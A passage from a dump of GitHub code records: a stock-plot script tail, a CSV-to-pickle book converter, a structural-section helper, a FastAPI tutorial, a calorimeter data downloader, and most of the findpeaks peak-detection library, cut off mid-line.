readData(\"../Results/stock_{}_days_test_score_idents.csv\".format(i))\r\n\t\tplotSamples(samples,i)\r\n\tfor i in range(1,11):\r\n\t\tsamples = readData(\"../Results/stock2_{}_days_test_score_idents.csv\".format(i))\r\n\t\tplotSamples(samples,i+10)\r\n\r\n\r\nif __name__==\"__main__\":\r\n\tmain()","repo_name":"nc3816/predict_stock_value_bigDataProject","sub_path":"Scripts/plotResults.py","file_name":"plotResults.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6855871860","text":"from bookClass import Book\nimport csv\nimport os\nimport pickle\n\nfilename = \"details.csv\"\n\n# reading csv file\nwith open(filename, 'r') as csvfile:\n    # creating a csv reader object\n    csvreader = csv.reader(csvfile)\n    rows = []\n    # extracting each data row one by one\n    for row in csvreader:\n        rows.append(row)\nBooks = []\nindex = 0\nfor row in rows:\n    print(index)\n    oneBook = Book()\n    oneBook.set_index(row[0])\n    oneBook.set_title(row[1])\n    oneBook.set_author(row[2])\n    oneBook.set_description(row[3])\n    oneBook.set_rating(row[4])\n    oneBook.set_genre(row[5])\n    oneBook.set_chars(row[6])\n    oneBook.set_awards(row[7])\n    oneBook.set_all_text(row[8])\n    Books.append(oneBook)\n    index = index + 1\npickle_out = open(os.getcwd() + \"/book_info.pickle\",\"wb\")\npickle.dump(Books, pickle_out)\npickle_out.close()\n","repo_name":"kaushikn97/Libro","sub_path":"csv_to_pickle.py","file_name":"csv_to_pickle.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25822335475","text":"# -*- coding: utf-8 -*-\n# XXX Migrate to YAML\n\nimport geom\nfrom materials.ehe import EHE_materials\n\ndef define_section(preprocessor, leverArm, barDiam, barArea):\n    barsSectionGeometry= preprocessor.getMaterialHandler.newSectionGeometry(\"barsSectionGeometry\")\n    reinforcement= barsSectionGeometry.getReinfLayers\n    reinforcementInf= reinforcement.newStraightReinfLayer(EHE_materials.B500S.nmbDiagD)\n    reinforcementInf.numReinfBars= 2\n    reinforcementInf.barDiam= barDiam\n    reinforcementInf.barArea= barArea\n    reinforcementInf.p1= geom.Pos2d(-leverArm,leverArm) # bottom layer.\n    reinforcementInf.p2= geom.Pos2d(-leverArm,-leverArm)\n    reinforcementSup= reinforcement.newStraightReinfLayer(EHE_materials.B500S.nmbDiagD)\n    reinforcementSup.numReinfBars= 2\n    reinforcementSup.barDiam= barDiam\n    reinforcementSup.barArea= barArea\n    reinforcementSup.p1= geom.Pos2d(leverArm,leverArm) # top layer.\n    reinforcementSup.p2= geom.Pos2d(leverArm,-leverArm)\n    return barsSectionGeometry, reinforcementInf, reinforcementSup\n","repo_name":"xcfem/xc","sub_path":"verif/tests/aux/barsSectionGeometry.py","file_name":"barsSectionGeometry.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"34080132534","text":"# Everything implemented with FastAPI automatically gets API docs generated at server-address/redoc and server-address/docs\n\nfrom fastapi import FastAPI\napp = FastAPI()\n\nfrom fastapi.responses import FileResponse # module that can serve files such as HTML when a path is accessed\n\n@app.get(\"/\") # '/' means the main page.\ndef main_server():\n    return 'hello' # content shown when the main page is accessed\n\n@app.get(\"/data\")\ndef data_page():\n    return FileResponse('index.html') # uses the module imported above; pass a file path to FileResponse('file path') and the file\n                                      # is sent to the user when this address is accessed\n\n'''\nHow do we receive specific data from the user? 
(name, email, user ID, etc.)\n'''\n\nfrom pydantic import BaseModel\n# For DB input/output, the database connection code would go here\n\nclass rec_type(BaseModel): # model for the data the user will send; models are created by subclassing BaseModel\n    name : str # written in the form \"field name : type\", e.g. a name is a string, so name : str\n    phone : int\n\n@app.post(\"/send\") # use @app.post to receive data from the user; app.post(\"/send\") means data is sent to the /send url\ndef post_page(data : rec_type): # parameter that holds the posted data\n    print(data) # print the data sent by the user\n    # For DB input/output, the DB read/write code would go here\n    return 'Transfer complete'\n\nimport asyncio\n\n@app.get(\"/test\")\nasync def async_page(): # putting async in front of def\n    await asyncio.sleep(1) # makes await usable here. await = asynchronous handling: simply put, if the awaited call takes a long time,\n    # other requests can be handled in the meantime. Thanks to this, processing can be faster than frameworks such as django or flask\n    return 'haha'","repo_name":"chaewu/TIL","sub_path":"FastAPI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34456619637","text":"#!/usr/bin/env python\n\nimport wget\nimport os\nimport ROOT\n\n# Download ROOT file with toy calorimeter data\nfilename = \"testDataReg.root\"\nif not os.path.exists(filename):\n    wget.download(\"https://www.hep1.physik.uni-bonn.de/people/homepages/tmva/testDataReg.root\")\n\n# Read out events and write to CSV file\noutput_file = open(\"toy_calorimeter.csv\", \"w\")\nfor i in range(13):\n    output_file.write(\"e{} \".format(i))\noutput_file.write(\"etruth\\n\")\n\nfile_ = ROOT.TFile(filename)\ntree = file_.Get(\"TreeR\")\nfor event in tree:\n    for i in range(13):\n        output_file.write(\"{} \".format(getattr(event, \"e{}\".format(i))))\n    output_file.write(\"{}\\n\".format(getattr(event, \"etruth\")))\n","repo_name":"stwunsch/fermilab_keras_workshop","sub_path":"utils/preprocess_calorimeter_data.py","file_name":"preprocess_calorimeter_data.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"71221763609","text":"\"\"\"Python library for the detection of peaks and valleys.\"\"\"\n# ----------------------------------------------------\n# Name        : findpeaks.py\n# Author      : E.Taskesen\n# Contact     : erdogant@gmail.com\n# github      : https://github.com/erdogant/findpeaks\n# Licence     : See LICENSE\n# ----------------------------------------------------\n\n# import findpeaks\nfrom peakdetect import peakdetect\nfrom caerus import caerus\nimport caerus.utils.csplots as csplots\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport os\nimport requests\nfrom urllib.parse import urlparse\n\n# #### DEBUG ONLY ####\n# import stats as stats\n# from stats import disable_tqdm\n# import interpolate as interpolate\n# #####################\nimport findpeaks.stats as stats\nfrom findpeaks.stats import disable_tqdm\nimport findpeaks.interpolate as interpolate\n# #####################\n\n\n# %%\nclass findpeaks():\n    \"\"\"Python library for the detection of peaks and valleys.\n\n    findpeaks is for the detection and visualization of peaks and valleys in a 1D-vector and 2D-array.\n    In case of 2D-array, the image can be pre-processed by resizing, scaling, and denoising. For a 1D-vector,\n    pre-processing by interpolation is possible. 
Peaks can be detected using various methods, and the results can be\n vizualized, such as the preprocessing steps, the persistence of peaks, the masking plot and a 3d-mesh plot.\n\n Examples\n --------\n >>> from findpeaks import findpeaks\n >>> X = [9,60,377,985,1153,672,501,1068,1110,574,135,23,3,47,252,812,1182,741,263,33]\n >>> fp = findpeaks(method='peakdetect', interpolate=10, lookahead=1)\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # 2D array example\n >>> from findpeaks import findpeaks\n >>> X = fp.import_example('2dpeaks')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Image example\n >>> from findpeaks import findpeaks\n >>> fp = findpeaks(method='topology', denoise='fastnl', params={'window': 30}, imsize=(300,300))\n >>> X = fp.import_example('2dpeaks_image')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Plot each seperately\n >>> fp.plot_preprocessing()\n >>> fp.plot_persistence()\n >>> fp.plot_mesh()\n\n References\n ----------\n * https://erdogant.github.io/findpeaks/\n\n \"\"\"\n\n def __init__(self,\n method=None,\n whitelist=['peak', 'valley'],\n lookahead=200,\n interpolate=None,\n limit=None,\n imsize=None,\n scale=True,\n togray=True,\n denoise='fastnl',\n window=None, # DEPRECATED IN LATER VERSIONS: specify in params\n cu=None, # DEPRECATED IN LATER VERSIONS: specify in params\n params_caerus={}, # DEPRECATED IN LATER VERSIONS: use params instead\n params={'window': 3, 'delta': 0},\n figsize=(15, 8),\n verbose=3):\n \"\"\"Initialize findpeaks parameters.\n\n Parameters\n ----------\n X : array-like (1d-vector or 2d-image)\n Input image data.\n method : String, (default : None).\n Available methods for peak detection. In case method=None, the default is choosen.\n 1d-vector approaches:\n * 'topology'\n * 'peakdetect' (default)\n * 'caerus'\n 2d-array approaches:\n * 'topology' (default)\n * 'mask'\n whitelist : str or list ['peak','valley']\n Choose what to detect:\n * 'peak'\n * 'valley'\n * ['peak','valley']\n lookahead : int, (default : 200)\n Looking ahead for peaks. For very small 1d arrays (such as up to 50 datapoints), use low numbers such as 1 or 2.\n interpolate : int, (default : None)\n Interpolation factor. The higher the number, the less sharp the edges will be.\n limit : float, (default : None)\n In case method='topology'\n Values > limit are active search areas to detect regions of interest (ROI).\n imsize : tuple, (default : None)\n resize to (width,length).\n scale : bool, (default : False)\n Scaling in range [0-255] by img*(255/max(img))\n denoise : string, (default : 'fastnl', None to disable)\n Filtering method to remove noise:\n * None\n * 'fastnl'\n * 'bilateral'\n * 'lee'\n * 'lee_enhanced'\n * 'lee_sigma'\n * 'kuan'\n * 'frost'\n * 'median'\n * 'mean'\n params : dict():\n Denoising parameters for the methods. If None are defined, the default will be used:\n * caerus (default): {'window': 50, 'minperc': 3, 'nlargest': 10, 'threshold': 0.25}\n * lee_sigma (default): {'window': 7, 'sigma': 0.9, 'num_looks': 1, 'tk': 5}\n * 'sigma': float, (default: 0.9): Speckle noise standard deviation, applies for methods: ['lee_sigma']\n * 'num_looks': int, (default: 1): Number of looks of the SAR img, applies for methods: ['lee_sigma']\n * 'tk': int, (default: 5): Threshold of neighbouring pixels outside of the 98th percentile, applies for methods: ['lee_sigma']\n * cu : float, (default: 0.25): The noise variation coefficient, applies for methods: ['kuan','lee','lee_enhanced']\n * window : int, (default : 3): Denoising window. 
Increasing the window size may removes noise better but may also removes details of image in certain denoising methods.\n * peakdetect\n 'delta' : int (default: 0): this specifies a minimum difference between a peak and the following points, before a peak may be considered a peak. Useful to hinder the function\n from picking up false peaks towards to end of the signal. To work well delta should be set to delta >= RMSnoise * 5.\n When omitted delta function causes a 20% decrease in speed. When used Correctly it can double the speed of the function\n togray : bool, (default : False)\n Conversion to gray scale.\n verbose : int (default : 3)\n Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n\n Returns\n -------\n dict()\n See 1dpeaks and 2dpeaks for more details.\n\n Examples\n --------\n >>> from findpeaks import findpeaks\n >>> X = [9,60,377,985,1153,672,501,1068,1110,574,135,23,3,47,252,812,1182,741,263,33]\n >>> fp = findpeaks(method='peakdetect', interpolate=10, lookahead=1)\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # 2D array example\n >>> from findpeaks import findpeaks\n >>> X = fp.import_example('2dpeaks')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Image example\n >>> from findpeaks import findpeaks\n >>> fp = findpeaks(method='topology', denoise='fastnl', params={'window': 30}, imsize=(300,300))\n >>> X = fp.import_example('2dpeaks_image')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Plot each seperately\n >>> fp.plot_preprocessing()\n >>> fp.plot_persistence()\n >>> fp.plot_mesh()\n\n References\n ----------\n * https://erdogant.github.io/findpeaks/\n \"\"\"\n if window is not None: print('The input parameter \"window\" will be deprecated in future releases. Please use \"params={\"window\": 5}\" instead.')\n if cu is not None: print('The input parameter \"cu\" will be deprecated in future releases. Please use \"params={\"cu\": 3}\" instead.')\n\n # Store in object\n if isinstance(whitelist, str): whitelist=[whitelist]\n if lookahead is None: lookahead=1\n lookahead = np.maximum(1, lookahead)\n # if method is None: raise Exception('[findpeaks] >Specify the desired method=\"topology\", \"peakdetect\", or \"mask\".')\n self.method = method\n self.whitelist = whitelist\n self.lookahead = lookahead\n self.interpolate = interpolate\n self.limit = limit\n self.imsize = imsize\n self.scale = scale\n self.togray = togray\n self.denoise = denoise\n self.figsize = figsize\n self.verbose = verbose\n\n # Store parameters for caerus\n defaults={}\n if method=='caerus':\n if len(params_caerus)>0:\n print('The input parameter \"params_caerus\" will be deprecated in future releases. 
Please use \"params\" instead.')\n params = params_caerus\n defaults = {'window': 50, 'minperc': 3, 'nlargest': 10, 'threshold': 0.25}\n elif method=='lee_sigma':\n defaults = {'window': 7, 'sigma': 0.9, 'num_looks': 1, 'tk': 5}\n elif method=='peakdetect':\n defaults = {'delta': 0}\n defaults = {**{'window': 3}, **defaults}\n\n params = {**defaults, **params}\n self.window = params['window']\n self.cu = params.get('cu', 0.25)\n self.params = params\n\n def fit(self, X, x=None):\n \"\"\"Detect peaks and valleys in a 1D vector or 2D-array (image).\n\n Description\n -----------\n * Fit the method on your data for the detection of peaks.\n * See 1dpeaks and 2dpeaks for more details about the input/output parameters.\n\n Parameters\n ----------\n X : array-like data.\n Input data.\n x : array-like data.\n Coordinates of the x-axis.\n\n Returns\n -------\n dict()\n * See 1dpeaks and 2dpeaks for more details.\n\n \"\"\"\n # Check datatype\n if isinstance(X, list):\n X = np.array(X)\n if isinstance(X, type(pd.DataFrame())):\n X = X.values\n\n if len(X.shape)>1:\n # 2d-array (image)\n results = self.peaks2d(X, method=self.method)\n else:\n # 1d-array (vector)\n results = self.peaks1d(X, x=x, method=self.method)\n\n return results\n\n # Find peaks in 1D vector\n def peaks1d(self, X, x=None, method='peakdetect'):\n \"\"\"Detect of peaks in 1D array.\n\n Description\n -----------\n This function only eats the input data. Use the .fit() function for more information regarding the input parameters:\n * method : method to be used for peak detection: 'topology' or 'peakdetect'.\n * lookahead : Looking ahead for peaks. For very small 1d arrays (such as up to 50 datapoints), use low numbers: 1 or 2.\n * interpolate : Interpolation factor. The higher the number, the less sharp the edges will be.\n * limit : Values > limit are set as regions of interest (ROI).\n * verbose : Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n\n Parameters\n ----------\n X : array-like 1D vector.\n Input data.\n x : array-like 1D vector.\n Coordinates of the x-axis.\n\n Returns\n -------\n dict() : Results in \"df\" are based on the input-data, whereas \"df_interp\" are the interpolated results.\n * persistence : Scores when using topology method.\n * Xranked : Similar to column \"rank\".\n * Xdetect : Similar to the column \"score\".\n * df : Is ranked in the same manner as the input data and provides information about the detected peaks and valleys.\n persistence : pd.DataFrame()\n * x, y : coordinates\n * birth : Birth level\n * death : Death level\n * score : persistence scores\n df : pd.DataFrame()\n * x, y : Coordinates\n * labx : The label of the peak area\n * rank : The ranking number of the best performing peaks (1 is best)\n * score : persistence score\n * valley : Whether the point is marked as valley\n * peak : Whether the point is marked as peak\n\n Examples\n --------\n >>> from findpeaks import findpeaks\n >>> X = [9,60,377,985,1153,672,501,1068,1110,574,135,23,3,47,252,812,1182,741,263,33]\n >>> fp = findpeaks(method='peakdetect', interpolate=10, lookahead=1)\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> fp = findpeaks(method='topology')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>> fp.plot_persistence()\n\n \"\"\"\n if method is None: method='peakdetect'\n self.method = method\n self.type = 'peaks1d'\n if self.verbose>=3: print('[findpeaks] >Finding peaks in 1d-vector using [%s] method..' 
%(self.method))\n # Make numpy array\n X = np.array(X)\n Xraw = X.copy()\n result = {}\n\n # Interpolation\n if self.interpolate is not None:\n X = interpolate.interpolate_line1d(X, n=self.interpolate, method=2, showfig=False, verbose=self.verbose)\n\n # Compute peaks based on method\n if method=='peakdetect':\n # Peakdetect method\n max_peaks, min_peaks = peakdetect(X, lookahead=self.lookahead, delta=self.params['delta'])\n # Post processing for the peak-detect\n result['peakdetect'] = stats._post_processing(X, Xraw, min_peaks, max_peaks, self.interpolate, self.lookahead)\n elif method=='topology':\n # Compute persistence using toplogy method\n result = stats.topology(np.c_[X, X], limit=self.limit, verbose=self.verbose)\n # Post processing for the topology method\n result['topology'] = stats._post_processing(X, Xraw, result['valley'], result['peak'], self.interpolate, 1)\n elif method=='caerus':\n cs = caerus(**self.params)\n result = cs.fit(X, return_as_dict=True, verbose=self.verbose)\n # Post processing for the caerus method\n result['caerus'] = stats._post_processing(X, Xraw, np.c_[result['loc_start_best'], result['loc_start_best']], np.c_[result['loc_stop_best'], result['loc_stop_best']], self.interpolate, 1, labxRaw=result['df']['labx'].values)\n result['caerus']['model'] = cs\n else:\n if self.verbose>=2: print('[findpeaks] >WARNING: [method=\"%s\"] is not supported in 1d-vector data. ' %(self.method))\n return None\n # Store\n self.results, self.args = self._store1d(X, Xraw, x, result)\n # Return\n return self.results\n\n # Store 1D vector\n def _store1d(self, X, Xraw, xs, result):\n # persist_score, res_peakd, results_topology\n # persist_score, results_peaksdetect, results_topology\n if xs is None: xs = np.arange(0, len(X))\n results = {}\n # Interpolated data\n dfint = pd.DataFrame()\n dfint['x'] = xs\n dfint['y'] = X\n # Store results for method\n if self.method=='peakdetect':\n # peakdetect\n dfint['labx'] = result['peakdetect']['labx_s']\n dfint['valley'] = False\n dfint['peak'] = False\n if result['peakdetect']['min_peaks_s'] is not None:\n dfint['valley'].iloc[result['peakdetect']['min_peaks_s'][:, 0].astype(int)] = True\n if result['peakdetect']['max_peaks_s'] is not None:\n dfint['peak'].iloc[result['peakdetect']['max_peaks_s'][:, 0].astype(int)] = True\n elif self.method=='topology':\n # Topology\n dfint['labx'] = result['topology']['labx_s']\n dfint['rank'] = result['Xranked']\n dfint['score'] = result['Xdetect']\n dfint['valley'] = False\n dfint['peak'] = False\n if result['topology']['min_peaks_s'] is not None:\n dfint['valley'].iloc[result['topology']['min_peaks_s'][:, 0].astype(int)] = True\n if result['topology']['max_peaks_s'] is not None:\n dfint['peak'].iloc[result['topology']['max_peaks_s'][:, 0].astype(int)] = True\n\n results['persistence'] = result['persistence']\n results['Xdetect'] = result['Xdetect']\n results['Xranked'] = result['Xranked']\n results['groups0'] = result['groups0']\n elif self.method=='caerus':\n # caerus\n dfint = result['df'].copy()\n dfint['y'] = result['X']\n dfint.drop(labels='X', inplace=True, axis=1)\n dfint['x'] = xs\n # dfint['labx'] = result['caerus']['labx_s']\n # dfint['valley'] = False\n # dfint['peak'] = False\n # if result['caerus']['min_peaks_s'] is not None:\n # dfint['valley'].iloc[result['caerus']['min_peaks_s'][:, 0].astype(int)] = True\n # if result['caerus']['max_peaks_s'] is not None:\n # dfint['peak'].iloc[result['caerus']['max_peaks_s'][:, 0].astype(int)] = True\n\n # As for the input data\n if self.interpolate is 
not None:\n df = pd.DataFrame()\n df['y'] = Xraw\n # Store results for method\n if self.method=='peakdetect':\n # peakdetect\n df['x'] = result['peakdetect']['xs']\n df['labx'] = result['peakdetect']['labx']\n df['valley'] = False\n df['peak'] = False\n if result['peakdetect']['min_peaks'] is not None:\n df['valley'].iloc[result['peakdetect']['min_peaks'][:, 0].astype(int)] = True\n if result['peakdetect']['max_peaks'] is not None:\n df['peak'].iloc[result['peakdetect']['max_peaks'][:, 0].astype(int)] = True\n elif self.method=='topology':\n # Topology\n df['x'] = result['topology']['xs']\n df['labx'] = result['topology']['labx']\n df['valley'] = False\n df['peak'] = False\n if result['topology']['min_peaks'] is not None:\n df['valley'].iloc[result['topology']['min_peaks'][:, 0].astype(int)] = True\n if result['topology']['max_peaks'] is not None:\n df['peak'].iloc[result['topology']['max_peaks'][:, 0].astype(int)] = True\n\n # Store the score and ranking\n df['rank'] = 0\n df['score'] = 0\n\n df['rank'].iloc[result['topology']['max_peaks'][:, 0].astype(int)] = dfint['rank'].iloc[result['topology']['max_peaks_s'][:, 0].astype(int)].values\n df['score'].iloc[result['topology']['max_peaks'][:, 0].astype(int)] = dfint['score'].iloc[result['topology']['max_peaks_s'][:, 0].astype(int)].values\n # df['rank'].loc[df['peak']] = dfint['rank'].loc[dfint['peak']].values\n # df['score'].loc[df['peak']] = dfint['score'].loc[dfint['peak']].values\n if self.method=='caerus':\n # caerus\n df['x'] = result['caerus']['xs']\n df['labx'] = result['df']['labx']\n df['valley'] = False\n df['peak'] = False\n if result['caerus']['min_peaks'] is not None:\n df['valley'].iloc[result['caerus']['min_peaks'][:, 0].astype(int)] = True\n if result['caerus']['max_peaks'] is not None:\n df['peak'].iloc[result['caerus']['max_peaks'][:, 0].astype(int)] = True\n\n # Store in results\n results['df'] = df\n results['df_interp'] = dfint\n else:\n results['df'] = dfint\n\n if self.method=='caerus':\n results['model'] = result['caerus']['model']\n # Arguments\n args = {}\n args['method'] = self.method\n args['params'] = self.params\n args['lookahead'] = self.lookahead\n args['interpolate'] = self.interpolate\n args['figsize'] = self.figsize\n args['type'] = self.type\n # Return\n return results, args\n\n # Find peaks in 2D-array\n def peaks2d(self, X, method='topology'):\n \"\"\"Detect peaks and valleys in a 2D-array or image.\n\n Description\n -----------\n To handle 2d-arrays or images. Use the .fit() function for more information regarding the input parameters:\n * method : method to be used for peak detection: 'topology', or 'mask'\n * limit : Values > limit are set as regions of interest (ROI).\n * scale : Scaling data in range [0-255] by img*(255/max(img))\n * denoise : Remove noise using method:\n * None\n * 'fastnl'\n * 'bilateral'\n * 'lee'\n * 'lee_enhanced'\n * 'lee_sigma'\n * 'kuan'\n * 'frost'\n * 'median'\n * 'mean'\n * window : Denoising window.\n * cu : noise variation coefficient\n * togray : Conversion to gray scale.\n * imsize : resize image\n * verbose : Print to screen. 
0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n\n Parameters\n ----------\n X : array-like 1D vector.\n Input data.\n\n Returns\n -------\n dict()\n * Xraw : The RAW input data\n * Xproc : The pre-processed data\n * Xdetect : The detected peaks with the persistence scores (same shape as the input data)\n * XRanked : The detected peaks but based on the strenght (same shape as the input data)\n * persistence : pd.DataFrame()\n * x, y : coordinates\n * birth : Birth level\n * death : Death level\n * score : persistence scores\n\n Examples\n --------\n >>> # 2D array example\n >>> from findpeaks import findpeaks\n >>> X = fp.import_example('2dpeaks')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Image example\n >>> from findpeaks import findpeaks\n >>> X = fp.import_example('2dpeaks_image')\n >>> fp = findpeaks(denoise='fastnl', params={'window': 30}, imsize=(300,300))\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Plot each seperately\n >>> fp.plot_preprocessing()\n >>> fp.plot_persistence()\n >>> fp.plot_mesh()\n\n \"\"\"\n if method is None: method='topology'\n self.method = method\n self.type = 'peaks2d'\n if self.verbose>=3: print('[findpeaks] >Finding peaks in 2d-array using %s method..' %(self.method))\n if (not self.togray) and (len(X.shape)==3) and (self.method=='topology'): raise Exception('[findpeaks] >Error: Topology method requires 2d-array. Your input is 3d. Hint: set togray=True.')\n\n # Preprocessing the image\n Xproc = self.preprocessing(X, showfig=False)\n # Compute peaks based on method\n if method=='topology':\n # Compute persistence based on topology method\n result = stats.topology2d(Xproc, limit=self.limit, whitelist=self.whitelist, verbose=self.verbose)\n # result = stats.topology(Xproc, limit=self.limit, verbose=self.verbose)\n elif method=='mask':\n # Compute peaks using local maximum filter.\n result = stats.mask(Xproc, limit=self.limit, verbose=self.verbose)\n else:\n if self.verbose>=2: print('[findpeaks] >WARNING: [method=\"%s\"] is not supported in 2d-array (image) data. ' %(self.method))\n return None\n\n # Store\n self.results, self.args = self._store2d(X, Xproc, result)\n # Return\n if self.verbose>=3: print('[findpeaks] >Fin.')\n return self.results\n\n # Store 2D-array\n def _store2d(self, X, Xproc, result):\n # Store results\n results = {}\n results['Xraw'] = X\n results['Xproc'] = Xproc\n\n # Store method specific results\n if self.method=='topology':\n # results['topology'] = result\n results['Xdetect'] = result['Xdetect']\n results['Xranked'] = result['Xranked']\n results['persistence'] = result['persistence']\n # results['peak'] = result['peak'] # These values are incorrect when using 2d\n # results['valley'] = result['valley'] # These values are incorrect when using 2d\n results['groups0'] = result['groups0']\n if self.method=='mask':\n results['Xdetect'] = result['Xdetect']\n results['Xranked'] = result['Xranked']\n\n # Store arguments\n args = {}\n args['limit'] = self.limit\n args['scale'] = self.scale\n args['denoise'] = self.denoise\n args['togray'] = self.togray\n args['imsize'] = self.imsize\n args['figsize'] = self.figsize\n args['type'] = self.type\n # Return\n return results, args\n\n # Pre-processing\n def preprocessing(self, X, showfig=False):\n \"\"\"Preprocessing steps of the 2D array (image).\n\n The pre-processing has 4 (optional) steps.\n 1. Resizing (to reduce computation time).\n 2. Scaling color pixels between [0-255]\n 3. Conversion to gray-scale. This is required for some analysis.\n 4. 
Denoising of the image.\n\n Parameters\n ----------\n X : numpy-array\n Input data or image.\n showfig : bool\n Show the preocessing steps in figures. The default is None.\n\n Returns\n -------\n X : numpy-array\n Processed image.\n\n \"\"\"\n if showfig:\n # Number of axis to create:\n nplots = 1 + (self.imsize is not None) + self.scale + self.togray + (self.denoise is not None)\n fig, ax = plt.subplots(1, nplots, figsize=self.figsize)\n iax = 0\n\n # Plot RAW input image\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Input\\nRange: [%.3g,%.3g]' %(X.min(), X.max()))\n iax = iax + 1\n # plt.show()\n\n # Resize\n if self.imsize:\n X = stats.resize(X, size=self.imsize, verbose=self.verbose)\n if showfig:\n # plt.figure(figsize=self.figsize)\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Resize\\n(%s,%s)' %(self.imsize))\n iax = iax + 1\n # Scaling color range between [0,255]\n if self.scale:\n X = stats.scale(X, verbose=self.verbose)\n if showfig:\n # plt.figure(figsize=self.figsize)\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Scale\\nRange: [%.3g %.3g]' %(X.min(), X.max()))\n iax = iax + 1\n # Convert to gray image\n if self.togray:\n X = stats.togray(X, verbose=self.verbose)\n if showfig:\n # plt.figure(figsize=self.figsize)\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Color conversion\\nGray')\n iax = iax + 1\n # Denoising\n if self.denoise is not None:\n X = stats.denoise(X, method=self.denoise, window=self.window, cu=self.cu, verbose=self.verbose)\n if showfig:\n # plt.figure(figsize=self.figsize)\n ax[iax].imshow(X, cmap=('gray_r' if self.togray else None))\n ax[iax].grid(False)\n ax[iax].set_title('Denoise\\n' + self.method)\n iax = iax + 1\n # Return\n return X\n\n # Pre-processing\n def imread(self, path, verbose=3):\n \"\"\"Read file from disk or url.\n\n Parameters\n ----------\n path : String\n filepath or Url.\n\n Returns\n -------\n X : Numpy array\n\n \"\"\"\n cv2 = stats._import_cv2()\n if is_url(path):\n if verbose>=3: print('[findpeaks] >Downloading from github source: [%s]' %(path))\n response = requests.get(path)\n img_array = np.asarray(bytearray(response.content), dtype=np.uint8)\n X = cv2.imdecode(img_array, cv2.IMREAD_COLOR)\n elif os.path.isfile(path):\n if verbose>=3: print('[findpeaks] >Import [%s]' %(path))\n X = cv2.imread(path)\n # Return\n return X\n\n # %% Plotting\n def plot(self, limit=None, legend=True, figsize=None, cmap=None, text=True, xlabel='x-axis', ylabel='y-axis'):\n \"\"\"Plot results.\n\n Parameters\n ----------\n legend : bool, (default: True)\n Show the legend.\n figsize : (int, int), optional, default: (15, 8)\n (width, height) in inches.\n cmap : object (default : None)\n Colormap. The default is derived wether image is convert to grey or not. Other options are: plt.cm.hot_r.\n text : Bool (default : True)\n Include text to the 2d-image that shows the peaks (p-number) and valleys (v-number)\n\n Returns\n -------\n fig_axis : tuple containing (fig, ax)\n\n \"\"\"\n if not hasattr(self, 'results'):\n if self.verbose>=2: print('[findpeaks] >WARNING: Nothing to plot. 
')\n return None\n\n figsize = figsize if figsize is not None else self.args['figsize']\n\n if self.args['type']=='peaks1d':\n fig_axis = self.plot1d(legend=legend, figsize=figsize, xlabel=xlabel, ylabel=ylabel)\n elif self.args['type']=='peaks2d':\n # fig_axis = self.plot2d(figsize=figsize)\n fig_axis = self.plot_mask(figsize=figsize, cmap=cmap, text=text, limit=limit)\n else:\n if self.verbose>=2: print('[findpeaks] >WARNING: Nothing to plot for %s' %(self.args['type']))\n return None\n\n # Return\n return fig_axis\n\n def plot1d(self, legend=True, figsize=None, xlabel='x-axis', ylabel='y-axis'):\n \"\"\"Plot the 1D results.\n\n Parameters\n ----------\n legend : bool, (default: True)\n Show the legend.\n figsize : (int, int), (default: None)\n (width, height) in inches.\n\n Returns\n -------\n fig_axis : tuple containing axis for each figure.\n\n \"\"\"\n if not self.args['type']=='peaks1d':\n if self.verbose>=3: print('[findpeaks] >Requires results of 1D data.')\n return None\n\n figsize = figsize if figsize is not None else self.args['figsize']\n ax1, ax2 = None, None\n title = self.method\n\n if self.method=='caerus':\n if self.results.get('model', None) is not None:\n ax = self.results['model'].plot(figsize=self.figsize)\n csplots._plot_graph(self.results['model'].results, figsize=self.figsize, xlabel=xlabel, ylabel=ylabel)\n # Return axis\n return ax\n else:\n # Make plot\n min_peaks, max_peaks = np.array([]), np.array([])\n df = self.results['df']\n if np.any('valley' in self.whitelist):\n min_peaks = df['x'].loc[df['valley']].values\n if np.any('peak' in self.whitelist):\n max_peaks = df['x'].loc[df['peak']].values\n ax1 = _plot_original(df['y'].values, df['x'].values, df['labx'].values, min_peaks.astype(int), max_peaks.astype(int), title=title, figsize=figsize, legend=legend, xlabel=xlabel, ylabel=ylabel)\n\n # Make interpolated plot\n if self.interpolate is not None:\n min_peaks, max_peaks = np.array([]), np.array([])\n df_interp = self.results['df_interp']\n if np.any('valley' in self.whitelist):\n min_peaks = df_interp['x'].loc[df_interp['valley']].values\n if np.any('peak' in self.whitelist):\n max_peaks = 